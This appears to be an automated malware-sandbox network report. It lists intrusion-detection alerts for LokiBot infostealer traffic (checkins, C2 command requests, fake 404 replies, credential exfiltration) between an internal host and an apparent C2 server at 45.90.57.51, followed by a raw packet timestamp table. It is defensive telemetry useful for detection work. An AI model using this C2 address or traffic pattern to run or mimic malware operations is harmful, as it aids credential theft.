                  05/16/24-00:38:23.333175TCP2825766ETPRO TROJAN LokiBot Checkin M24976080192.168.2.545.90.57.51
                  05/16/24-00:37:02.627302TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971080192.168.2.545.90.57.51
                  05/16/24-00:38:23.333175TCP2025381ET TROJAN LokiBot Checkin4976080192.168.2.545.90.57.51
                  05/16/24-00:37:14.907253TCP2825766ETPRO TROJAN LokiBot Checkin M24972480192.168.2.545.90.57.51
                  05/16/24-00:38:52.000180TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977480192.168.2.545.90.57.51
                  05/16/24-00:37:33.315004TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973380192.168.2.545.90.57.51
                  05/16/24-00:38:52.000180TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977480192.168.2.545.90.57.51
                  05/16/24-00:38:33.811515TCP2825766ETPRO TROJAN LokiBot Checkin M24976580192.168.2.545.90.57.51
                  05/16/24-00:37:23.884685TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972880192.168.2.545.90.57.51
                  05/16/24-00:37:23.884685TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972880192.168.2.545.90.57.51
                  05/16/24-00:37:59.470457TCP2825766ETPRO TROJAN LokiBot Checkin M24974780192.168.2.545.90.57.51
                  05/16/24-00:38:15.699411TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975680192.168.2.545.90.57.51
                  05/16/24-00:36:55.076784TCP2825766ETPRO TROJAN LokiBot Checkin M24970680192.168.2.545.90.57.51
                  05/16/24-00:37:05.048280TCP2025483ET TROJAN LokiBot Fake 404 Response804971145.90.57.51192.168.2.5
                  05/16/24-00:37:25.750611TCP2025381ET TROJAN LokiBot Checkin4972980192.168.2.545.90.57.51
                  05/16/24-00:37:25.750611TCP2825766ETPRO TROJAN LokiBot Checkin M24972980192.168.2.545.90.57.51
                  05/16/24-00:38:15.699411TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975680192.168.2.545.90.57.51
                  05/16/24-00:37:49.343817TCP2025381ET TROJAN LokiBot Checkin4974280192.168.2.545.90.57.51
                  05/16/24-00:38:08.955748TCP2825766ETPRO TROJAN LokiBot Checkin M24975280192.168.2.545.90.57.51
                  05/16/24-00:38:07.071740TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975180192.168.2.545.90.57.51
                  05/16/24-00:38:39.485062TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976880192.168.2.545.90.57.51
                  05/16/24-00:38:43.272420TCP2825766ETPRO TROJAN LokiBot Checkin M24977080192.168.2.545.90.57.51
                  05/16/24-00:37:14.907253TCP2025381ET TROJAN LokiBot Checkin4972480192.168.2.545.90.57.51
                  05/16/24-00:38:33.811515TCP2025381ET TROJAN LokiBot Checkin4976580192.168.2.545.90.57.51
                  05/16/24-00:37:07.254938TCP2025381ET TROJAN LokiBot Checkin4971280192.168.2.545.90.57.51
                  05/16/24-00:38:09.462527TCP2025483ET TROJAN LokiBot Fake 404 Response804975245.90.57.51192.168.2.5
                  05/16/24-00:38:50.123310TCP2025381ET TROJAN LokiBot Checkin4977380192.168.2.545.90.57.51
                  05/16/24-00:38:43.272420TCP2025381ET TROJAN LokiBot Checkin4977080192.168.2.545.90.57.51
                  05/16/24-00:37:18.705946TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972680192.168.2.545.90.57.51
                  05/16/24-00:37:35.696425TCP2025483ET TROJAN LokiBot Fake 404 Response804973445.90.57.51192.168.2.5
                  05/16/24-00:38:37.577907TCP2025381ET TROJAN LokiBot Checkin4976780192.168.2.545.90.57.51
                  05/16/24-00:38:45.647664TCP2025483ET TROJAN LokiBot Fake 404 Response804977145.90.57.51192.168.2.5
                  05/16/24-00:38:54.389626TCP2025483ET TROJAN LokiBot Fake 404 Response804977545.90.57.51192.168.2.5
                  05/16/24-00:37:43.623424TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973880192.168.2.545.90.57.51
                  05/16/24-00:37:45.530428TCP2025381ET TROJAN LokiBot Checkin4973980192.168.2.545.90.57.51
                  05/16/24-00:37:04.537805TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971180192.168.2.545.90.57.51
                  05/16/24-00:37:09.676041TCP2025483ET TROJAN LokiBot Fake 404 Response804971345.90.57.51192.168.2.5
                  05/16/24-00:36:54.264582TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24970580192.168.2.545.90.57.51
                  05/16/24-00:38:10.859696TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975380192.168.2.545.90.57.51
                  05/16/24-00:37:04.537805TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971180192.168.2.545.90.57.51
                  05/16/24-00:37:28.165565TCP2025483ET TROJAN LokiBot Fake 404 Response804973045.90.57.51192.168.2.5
                  05/16/24-00:36:54.264582TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14970580192.168.2.545.90.57.51
                  05/16/24-00:38:16.216451TCP2025483ET TROJAN LokiBot Fake 404 Response804975645.90.57.51192.168.2.5
                  05/16/24-00:37:11.067189TCP2825766ETPRO TROJAN LokiBot Checkin M24972280192.168.2.545.90.57.51
                  05/16/24-00:37:44.125784TCP2025483ET TROJAN LokiBot Fake 404 Response804973845.90.57.51192.168.2.5
                  05/16/24-00:37:12.990169TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972380192.168.2.545.90.57.51
                  05/16/24-00:37:18.705946TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972680192.168.2.545.90.57.51
                  05/16/24-00:37:41.744488TCP2025381ET TROJAN LokiBot Checkin4973780192.168.2.545.90.57.51
                  05/16/24-00:38:05.193094TCP2825766ETPRO TROJAN LokiBot Checkin M24975080192.168.2.545.90.57.51
                  05/16/24-00:37:09.170149TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971380192.168.2.545.90.57.51
                  05/16/24-00:37:20.628600TCP2825766ETPRO TROJAN LokiBot Checkin M24972780192.168.2.545.90.57.51
                  05/16/24-00:37:53.120055TCP2825766ETPRO TROJAN LokiBot Checkin M24974480192.168.2.545.90.57.51
                  05/16/24-00:37:35.199755TCP2025381ET TROJAN LokiBot Checkin4973480192.168.2.545.90.57.51
                  05/16/24-00:38:01.356159TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974880192.168.2.545.90.57.51
                  05/16/24-00:37:16.803035TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972580192.168.2.545.90.57.51
                  05/16/24-00:37:47.452852TCP2025381ET TROJAN LokiBot Checkin4974080192.168.2.545.90.57.51
                  05/16/24-00:38:21.430034TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975980192.168.2.545.90.57.51
                  05/16/24-00:37:29.556038TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973180192.168.2.545.90.57.51
                  05/16/24-00:38:21.430034TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975980192.168.2.545.90.57.51
                  05/16/24-00:38:35.693093TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.545.90.57.51
                  05/16/24-00:36:52.383820TCP2025381ET TROJAN LokiBot Checkin4970480192.168.2.545.90.57.51
                  05/16/24-00:38:12.750490TCP2825766ETPRO TROJAN LokiBot Checkin M24975580192.168.2.545.90.57.51
                  05/16/24-00:37:55.010656TCP2025381ET TROJAN LokiBot Checkin4974580192.168.2.545.90.57.51
                  05/16/24-00:38:27.085627TCP2025381ET TROJAN LokiBot Checkin4976280192.168.2.545.90.57.51
                  05/16/24-00:37:09.170149TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971380192.168.2.545.90.57.51
                  05/16/24-00:38:01.356159TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974880192.168.2.545.90.57.51
                  05/16/24-00:37:00.746100TCP2025381ET TROJAN LokiBot Checkin4970980192.168.2.545.90.57.51
                  05/16/24-00:38:03.239293TCP2825766ETPRO TROJAN LokiBot Checkin M24974980192.168.2.545.90.57.51
                  05/16/24-00:38:19.541569TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975880192.168.2.545.90.57.51
                  05/16/24-00:38:23.839877TCP2025483ET TROJAN LokiBot Fake 404 Response804976045.90.57.51192.168.2.5
                  05/16/24-00:38:27.575264TCP2025483ET TROJAN LokiBot Fake 404 Response804976245.90.57.51192.168.2.5
                  05/16/24-00:37:53.120055TCP2025381ET TROJAN LokiBot Checkin4974480192.168.2.545.90.57.51
                  05/16/24-00:38:12.750490TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975580192.168.2.545.90.57.51
                  05/16/24-00:38:41.388891TCP2825766ETPRO TROJAN LokiBot Checkin M24976980192.168.2.545.90.57.51
                  05/16/24-00:37:26.257152TCP2025483ET TROJAN LokiBot Fake 404 Response804972945.90.57.51192.168.2.5
                  05/16/24-00:37:19.223879TCP2025483ET TROJAN LokiBot Fake 404 Response804972645.90.57.51192.168.2.5
                  05/16/24-00:38:37.577907TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976780192.168.2.545.90.57.51
                  05/16/24-00:38:47.045718TCP2825766ETPRO TROJAN LokiBot Checkin M24977280192.168.2.545.90.57.51
                  05/16/24-00:37:00.746100TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970980192.168.2.545.90.57.51
                  05/16/24-00:38:10.859696TCP2025381ET TROJAN LokiBot Checkin4975380192.168.2.545.90.57.51
                  05/16/24-00:38:25.211849TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976180192.168.2.545.90.57.51
                  05/16/24-00:37:37.130221TCP2025381ET TROJAN LokiBot Checkin4973580192.168.2.545.90.57.51
                  05/16/24-00:37:13.504816TCP2025483ET TROJAN LokiBot Fake 404 Response804972345.90.57.51192.168.2.5
                  05/16/24-00:37:15.418885TCP2025483ET TROJAN LokiBot Fake 404 Response804972445.90.57.51192.168.2.5
                  05/16/24-00:38:08.955748TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975280192.168.2.545.90.57.51
                  05/16/24-00:38:25.211849TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976180192.168.2.545.90.57.51
                  05/16/24-00:37:04.537805TCP2825766ETPRO TROJAN LokiBot Checkin M24971180192.168.2.545.90.57.51
                  05/16/24-00:37:47.452852TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974080192.168.2.545.90.57.51
                  05/16/24-00:38:34.303762TCP2025483ET TROJAN LokiBot Fake 404 Response804976545.90.57.51192.168.2.5
                  05/16/24-00:37:07.254938TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971280192.168.2.545.90.57.51
                  05/16/24-00:36:56.970973TCP2025381ET TROJAN LokiBot Checkin4970780192.168.2.545.90.57.51
                  05/16/24-00:38:08.955748TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975280192.168.2.545.90.57.51
                  05/16/24-00:37:41.744488TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973780192.168.2.545.90.57.51
                  05/16/24-00:37:18.705946TCP2025381ET TROJAN LokiBot Checkin4972680192.168.2.545.90.57.51
                  05/16/24-00:38:38.095021TCP2025483ET TROJAN LokiBot Fake 404 Response804976745.90.57.51192.168.2.5
                  05/16/24-00:38:39.999092TCP2025483ET TROJAN LokiBot Fake 404 Response804976845.90.57.51192.168.2.5
                  05/16/24-00:38:43.272420TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977080192.168.2.545.90.57.51
                  05/16/24-00:38:37.577907TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976780192.168.2.545.90.57.51
                  05/16/24-00:38:43.272420TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977080192.168.2.545.90.57.51
                  05/16/24-00:37:57.099162TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974680192.168.2.545.90.57.51
                  05/16/24-00:38:03.239293TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974980192.168.2.545.90.57.51
                  05/16/24-00:38:19.541569TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975880192.168.2.545.90.57.51
                  05/16/24-00:38:41.388891TCP2025381ET TROJAN LokiBot Checkin4976980192.168.2.545.90.57.51
                  05/16/24-00:38:03.239293TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974980192.168.2.545.90.57.51
                  05/16/24-00:38:52.000180TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977480192.168.2.545.90.57.51
                  05/16/24-00:37:02.627302TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971080192.168.2.545.90.57.51
                  05/16/24-00:38:10.859696TCP2825766ETPRO TROJAN LokiBot Checkin M24975380192.168.2.545.90.57.51
                  05/16/24-00:37:16.803035TCP2025381ET TROJAN LokiBot Checkin4972580192.168.2.545.90.57.51
                  05/16/24-00:38:21.430034TCP2825766ETPRO TROJAN LokiBot Checkin M24975980192.168.2.545.90.57.51
                  05/16/24-00:37:02.627302TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971080192.168.2.545.90.57.51
                  05/16/24-00:38:39.485062TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976880192.168.2.545.90.57.51
                  05/16/24-00:37:27.656502TCP2825766ETPRO TROJAN LokiBot Checkin M24973080192.168.2.545.90.57.51
                  05/16/24-00:37:07.254938TCP2825766ETPRO TROJAN LokiBot Checkin M24971280192.168.2.545.90.57.51
                  05/16/24-00:37:23.884685TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972880192.168.2.545.90.57.51
                  05/16/24-00:38:47.045718TCP2025381ET TROJAN LokiBot Checkin4977280192.168.2.545.90.57.51
                  05/16/24-00:37:33.315004TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973380192.168.2.545.90.57.51
                  05/16/24-00:38:15.699411TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975680192.168.2.545.90.57.51
                  05/16/24-00:38:07.071740TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975180192.168.2.545.90.57.51
                  05/16/24-00:37:33.315004TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973380192.168.2.545.90.57.51
                  05/16/24-00:38:39.485062TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976880192.168.2.545.90.57.51
                  05/16/24-00:36:55.076784TCP2025381ET TROJAN LokiBot Checkin4970680192.168.2.545.90.57.51
                  05/16/24-00:37:45.530428TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973980192.168.2.545.90.57.51
                  05/16/24-00:37:20.628600TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972780192.168.2.545.90.57.51
                  05/16/24-00:38:07.071740TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975180192.168.2.545.90.57.51
                  05/16/24-00:37:45.530428TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973980192.168.2.545.90.57.51
                  05/16/24-00:37:12.990169TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972380192.168.2.545.90.57.51
                  05/16/24-00:37:41.744488TCP2825766ETPRO TROJAN LokiBot Checkin M24973780192.168.2.545.90.57.51
                  05/16/24-00:37:42.248026TCP2025483ET TROJAN LokiBot Fake 404 Response804973745.90.57.51192.168.2.5
                  05/16/24-00:38:07.563893TCP2025483ET TROJAN LokiBot Fake 404 Response804975145.90.57.51192.168.2.5
                  05/16/24-00:38:50.619828TCP2025483ET TROJAN LokiBot Fake 404 Response804977345.90.57.51192.168.2.5
                  05/16/24-00:37:04.537805TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971180192.168.2.545.90.57.51
                  05/16/24-00:37:23.884685TCP2825766ETPRO TROJAN LokiBot Checkin M24972880192.168.2.545.90.57.51
                  05/16/24-00:37:47.452852TCP2825766ETPRO TROJAN LokiBot Checkin M24974080192.168.2.545.90.57.51
                  05/16/24-00:37:51.232610TCP2825766ETPRO TROJAN LokiBot Checkin M24974380192.168.2.545.90.57.51
                  05/16/24-00:37:35.199755TCP2825766ETPRO TROJAN LokiBot Checkin M24973480192.168.2.545.90.57.51
                  05/16/24-00:36:54.264582TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970580192.168.2.545.90.57.51
                  05/16/24-00:38:45.151548TCP2825766ETPRO TROJAN LokiBot Checkin M24977180192.168.2.545.90.57.51
                  05/16/24-00:36:58.862053TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970880192.168.2.545.90.57.51
                  05/16/24-00:37:00.746100TCP2825766ETPRO TROJAN LokiBot Checkin M24970980192.168.2.545.90.57.51
                  05/16/24-00:38:21.924787TCP2025483ET TROJAN LokiBot Fake 404 Response804975945.90.57.51192.168.2.5
                  05/16/24-00:37:31.926842TCP2025483ET TROJAN LokiBot Fake 404 Response804973245.90.57.51192.168.2.5
                  05/16/24-00:37:12.990169TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972380192.168.2.545.90.57.51
                  05/16/24-00:36:58.862053TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970880192.168.2.545.90.57.51
                  05/16/24-00:38:45.151548TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977180192.168.2.545.90.57.51
                  05/16/24-00:37:49.343817TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974280192.168.2.545.90.57.51
                  05/16/24-00:38:15.699411TCP2825766ETPRO TROJAN LokiBot Checkin M24975680192.168.2.545.90.57.51
                  05/16/24-00:38:17.603710TCP2025381ET TROJAN LokiBot Checkin4975780192.168.2.545.90.57.51
                  05/16/24-00:37:39.020338TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973680192.168.2.545.90.57.51
                  05/16/24-00:37:49.343817TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974280192.168.2.545.90.57.51
                  05/16/24-00:38:33.811515TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.545.90.57.51
                  05/16/24-00:38:27.085627TCP2825766ETPRO TROJAN LokiBot Checkin M24976280192.168.2.545.90.57.51
                  05/16/24-00:37:27.656502TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973080192.168.2.545.90.57.51
                  05/16/24-00:38:28.951650TCP2025381ET TROJAN LokiBot Checkin4976380192.168.2.545.90.57.51
                  05/16/24-00:37:03.138281TCP2025483ET TROJAN LokiBot Fake 404 Response804971045.90.57.51192.168.2.5
                  05/16/24-00:37:11.067189TCP2025381ET TROJAN LokiBot Checkin4972280192.168.2.545.90.57.51
                  05/16/24-00:38:21.430034TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975980192.168.2.545.90.57.51
                  05/16/24-00:37:14.907253TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972480192.168.2.545.90.57.51
                  05/16/24-00:37:39.020338TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973680192.168.2.545.90.57.51
                  TimestampSource PortDest PortSource IPDest IP
                  May 16, 2024 00:36:52.140711069 CEST4970480192.168.2.545.90.57.51
                  May 16, 2024 00:36:52.376828909 CEST804970445.90.57.51192.168.2.5
                  May 16, 2024 00:36:52.376983881 CEST4970480192.168.2.545.90.57.51
                  May 16, 2024 00:36:52.383820057 CEST4970480192.168.2.545.90.57.51
                  May 16, 2024 00:36:52.620134115 CEST804970445.90.57.51192.168.2.5
                  May 16, 2024 00:36:52.620201111 CEST4970480192.168.2.545.90.57.51
                  May 16, 2024 00:36:52.854576111 CEST804970445.90.57.51192.168.2.5
                  May 16, 2024 00:36:52.880095959 CEST804970445.90.57.51192.168.2.5
                  May 16, 2024 00:36:52.880112886 CEST804970445.90.57.51192.168.2.5
                  May 16, 2024 00:36:52.880244970 CEST4970480192.168.2.545.90.57.51
                  May 16, 2024 00:36:52.880395889 CEST4970480192.168.2.545.90.57.51
                  May 16, 2024 00:36:53.115060091 CEST804970445.90.57.51192.168.2.5
                  May 16, 2024 00:36:54.024975061 CEST4970580192.168.2.545.90.57.51
                  May 16, 2024 00:36:54.262383938 CEST804970545.90.57.51192.168.2.5
                  May 16, 2024 00:36:54.262470007 CEST4970580192.168.2.545.90.57.51
                  May 16, 2024 00:36:54.264581919 CEST4970580192.168.2.545.90.57.51
                  May 16, 2024 00:36:54.502063990 CEST804970545.90.57.51192.168.2.5
                  May 16, 2024 00:36:54.502151012 CEST4970580192.168.2.545.90.57.51
                  May 16, 2024 00:36:54.740143061 CEST804970545.90.57.51192.168.2.5
                  May 16, 2024 00:36:54.765763998 CEST804970545.90.57.51192.168.2.5
                  May 16, 2024 00:36:54.765805960 CEST804970545.90.57.51192.168.2.5
                  May 16, 2024 00:36:54.765908003 CEST4970580192.168.2.545.90.57.51
                  May 16, 2024 00:36:54.768630028 CEST4970580192.168.2.545.90.57.51
                  May 16, 2024 00:36:54.829427958 CEST4970680192.168.2.545.90.57.51
                  May 16, 2024 00:36:55.006936073 CEST804970545.90.57.51192.168.2.5
                  May 16, 2024 00:36:55.074166059 CEST804970645.90.57.51192.168.2.5
                  May 16, 2024 00:36:55.074250937 CEST4970680192.168.2.545.90.57.51
                  May 16, 2024 00:36:55.076783895 CEST4970680192.168.2.545.90.57.51
                  May 16, 2024 00:36:55.320790052 CEST804970645.90.57.51192.168.2.5
                  May 16, 2024 00:36:55.320893049 CEST4970680192.168.2.545.90.57.51
                  May 16, 2024 00:36:55.567595959 CEST804970645.90.57.51192.168.2.5
                  May 16, 2024 00:36:55.590960979 CEST804970645.90.57.51192.168.2.5
                  May 16, 2024 00:36:55.590975046 CEST804970645.90.57.51192.168.2.5
                  May 16, 2024 00:36:55.591025114 CEST4970680192.168.2.545.90.57.51
                  May 16, 2024 00:36:55.591105938 CEST4970680192.168.2.545.90.57.51
                  May 16, 2024 00:36:55.834033966 CEST804970645.90.57.51192.168.2.5
                  May 16, 2024 00:36:56.726418972 CEST4970780192.168.2.545.90.57.51
                  May 16, 2024 00:36:56.968671083 CEST804970745.90.57.51192.168.2.5
                  May 16, 2024 00:36:56.968795061 CEST4970780192.168.2.545.90.57.51
                  May 16, 2024 00:36:56.970973015 CEST4970780192.168.2.545.90.57.51
                  May 16, 2024 00:36:57.212793112 CEST804970745.90.57.51192.168.2.5
                  May 16, 2024 00:36:57.212929964 CEST4970780192.168.2.545.90.57.51
                  May 16, 2024 00:36:57.455156088 CEST804970745.90.57.51192.168.2.5
                  May 16, 2024 00:36:57.478820086 CEST804970745.90.57.51192.168.2.5
                  May 16, 2024 00:36:57.478837013 CEST804970745.90.57.51192.168.2.5
                  May 16, 2024 00:36:57.478919983 CEST4970780192.168.2.545.90.57.51
                  May 16, 2024 00:36:57.478981018 CEST4970780192.168.2.545.90.57.51
                  May 16, 2024 00:36:57.722186089 CEST804970745.90.57.51192.168.2.5
                  May 16, 2024 00:36:58.618002892 CEST4970880192.168.2.545.90.57.51
                  May 16, 2024 00:36:58.859782934 CEST804970845.90.57.51192.168.2.5
                  May 16, 2024 00:36:58.859914064 CEST4970880192.168.2.545.90.57.51
                  May 16, 2024 00:36:58.862052917 CEST4970880192.168.2.545.90.57.51
                  May 16, 2024 00:36:59.103797913 CEST804970845.90.57.51192.168.2.5
                  May 16, 2024 00:36:59.103864908 CEST4970880192.168.2.545.90.57.51
                  May 16, 2024 00:36:59.345592976 CEST804970845.90.57.51192.168.2.5
                  May 16, 2024 00:36:59.369699001 CEST804970845.90.57.51192.168.2.5
                  May 16, 2024 00:36:59.369712114 CEST804970845.90.57.51192.168.2.5
                  May 16, 2024 00:36:59.369811058 CEST4970880192.168.2.545.90.57.51
                  May 16, 2024 00:36:59.369868994 CEST4970880192.168.2.545.90.57.51
                  May 16, 2024 00:36:59.612186909 CEST804970845.90.57.51192.168.2.5
                  May 16, 2024 00:37:00.508028030 CEST4970980192.168.2.545.90.57.51
                  May 16, 2024 00:37:00.743834972 CEST804970945.90.57.51192.168.2.5
                  May 16, 2024 00:37:00.743952036 CEST4970980192.168.2.545.90.57.51
                  May 16, 2024 00:37:00.746099949 CEST4970980192.168.2.545.90.57.51
                  May 16, 2024 00:37:00.980556011 CEST804970945.90.57.51192.168.2.5
                  May 16, 2024 00:37:00.980633020 CEST4970980192.168.2.545.90.57.51
                  May 16, 2024 00:37:01.215014935 CEST804970945.90.57.51192.168.2.5
                  May 16, 2024 00:37:01.238713026 CEST804970945.90.57.51192.168.2.5
                  May 16, 2024 00:37:01.238724947 CEST804970945.90.57.51192.168.2.5
                  May 16, 2024 00:37:01.238842010 CEST4970980192.168.2.545.90.57.51
                  May 16, 2024 00:37:01.238903046 CEST4970980192.168.2.545.90.57.51
                  May 16, 2024 00:37:01.476190090 CEST804970945.90.57.51192.168.2.5
                  May 16, 2024 00:37:02.383997917 CEST4971080192.168.2.545.90.57.51
                  May 16, 2024 00:37:02.624978065 CEST804971045.90.57.51192.168.2.5
                  May 16, 2024 00:37:02.625116110 CEST4971080192.168.2.545.90.57.51
                  May 16, 2024 00:37:02.627301931 CEST4971080192.168.2.545.90.57.51
                  May 16, 2024 00:37:02.870266914 CEST804971045.90.57.51192.168.2.5
                  May 16, 2024 00:37:02.870373011 CEST4971080192.168.2.545.90.57.51
                  May 16, 2024 00:37:03.112654924 CEST804971045.90.57.51192.168.2.5
                  May 16, 2024 00:37:03.138281107 CEST804971045.90.57.51192.168.2.5
                  May 16, 2024 00:37:03.138294935 CEST804971045.90.57.51192.168.2.5
                  May 16, 2024 00:37:03.138394117 CEST4971080192.168.2.545.90.57.51
                  May 16, 2024 00:37:03.138434887 CEST4971080192.168.2.545.90.57.51
                  May 16, 2024 00:37:03.381742001 CEST804971045.90.57.51192.168.2.5
                  May 16, 2024 00:37:04.290246964 CEST4971180192.168.2.545.90.57.51
                  May 16, 2024 00:37:04.535465002 CEST804971145.90.57.51192.168.2.5
                  May 16, 2024 00:37:04.535563946 CEST4971180192.168.2.545.90.57.51
                  May 16, 2024 00:37:04.537805080 CEST4971180192.168.2.545.90.57.51
                  May 16, 2024 00:37:04.782433987 CEST804971145.90.57.51192.168.2.5
                  May 16, 2024 00:37:04.782536983 CEST4971180192.168.2.545.90.57.51
                  May 16, 2024 00:37:05.025089979 CEST804971145.90.57.51192.168.2.5
                  May 16, 2024 00:37:05.048280001 CEST804971145.90.57.51192.168.2.5
                  May 16, 2024 00:37:05.048291922 CEST804971145.90.57.51192.168.2.5
                  May 16, 2024 00:37:05.048405886 CEST4971180192.168.2.545.90.57.51
                  May 16, 2024 00:37:05.126118898 CEST4971180192.168.2.545.90.57.51
                  May 16, 2024 00:37:05.368635893 CEST804971145.90.57.51192.168.2.5
                  May 16, 2024 00:37:07.008030891 CEST4971280192.168.2.545.90.57.51
                  May 16, 2024 00:37:07.252615929 CEST804971245.90.57.51192.168.2.5
                  May 16, 2024 00:37:07.252775908 CEST4971280192.168.2.545.90.57.51
                  May 16, 2024 00:37:07.254937887 CEST4971280192.168.2.545.90.57.51
                  May 16, 2024 00:37:07.497678041 CEST804971245.90.57.51192.168.2.5
                  May 16, 2024 00:37:07.497780085 CEST4971280192.168.2.545.90.57.51
                  May 16, 2024 00:37:07.742532969 CEST804971245.90.57.51192.168.2.5
                  May 16, 2024 00:37:07.768110037 CEST804971245.90.57.51192.168.2.5
                  May 16, 2024 00:37:07.768121958 CEST804971245.90.57.51192.168.2.5
                  May 16, 2024 00:37:07.768207073 CEST4971280192.168.2.545.90.57.51
                  May 16, 2024 00:37:07.768295050 CEST4971280192.168.2.545.90.57.51
                  May 16, 2024 00:37:08.013346910 CEST804971245.90.57.51192.168.2.5
                  May 16, 2024 00:37:08.929712057 CEST4971380192.168.2.545.90.57.51
                  May 16, 2024 00:37:09.167841911 CEST804971345.90.57.51192.168.2.5
                  May 16, 2024 00:37:09.167980909 CEST4971380192.168.2.545.90.57.51
                  May 16, 2024 00:37:09.170149088 CEST4971380192.168.2.545.90.57.51
                  May 16, 2024 00:37:09.409989119 CEST804971345.90.57.51192.168.2.5
                  May 16, 2024 00:37:09.410101891 CEST4971380192.168.2.545.90.57.51
                  May 16, 2024 00:37:09.648677111 CEST804971345.90.57.51192.168.2.5
                  May 16, 2024 00:37:09.676040888 CEST804971345.90.57.51192.168.2.5
                  May 16, 2024 00:37:09.676055908 CEST804971345.90.57.51192.168.2.5
                  May 16, 2024 00:37:09.676122904 CEST4971380192.168.2.545.90.57.51
                  May 16, 2024 00:37:09.676172972 CEST4971380192.168.2.545.90.57.51
                  May 16, 2024 00:37:09.914439917 CEST804971345.90.57.51192.168.2.5
                  May 16, 2024 00:37:10.822846889 CEST4972280192.168.2.545.90.57.51
                  May 16, 2024 00:37:11.064896107 CEST804972245.90.57.51192.168.2.5
                  May 16, 2024 00:37:11.064975023 CEST4972280192.168.2.545.90.57.51
                  May 16, 2024 00:37:11.067188978 CEST4972280192.168.2.545.90.57.51
                  May 16, 2024 00:37:11.308636904 CEST804972245.90.57.51192.168.2.5
                  May 16, 2024 00:37:11.308711052 CEST4972280192.168.2.545.90.57.51
                  May 16, 2024 00:37:11.550667048 CEST804972245.90.57.51192.168.2.5
                  May 16, 2024 00:37:11.574807882 CEST804972245.90.57.51192.168.2.5
                  May 16, 2024 00:37:11.574822903 CEST804972245.90.57.51192.168.2.5
                  May 16, 2024 00:37:11.574892044 CEST4972280192.168.2.545.90.57.51
                  May 16, 2024 00:37:11.574930906 CEST4972280192.168.2.545.90.57.51
                  May 16, 2024 00:37:11.820250034 CEST804972245.90.57.51192.168.2.5
                  May 16, 2024 00:37:12.742119074 CEST4972380192.168.2.545.90.57.51
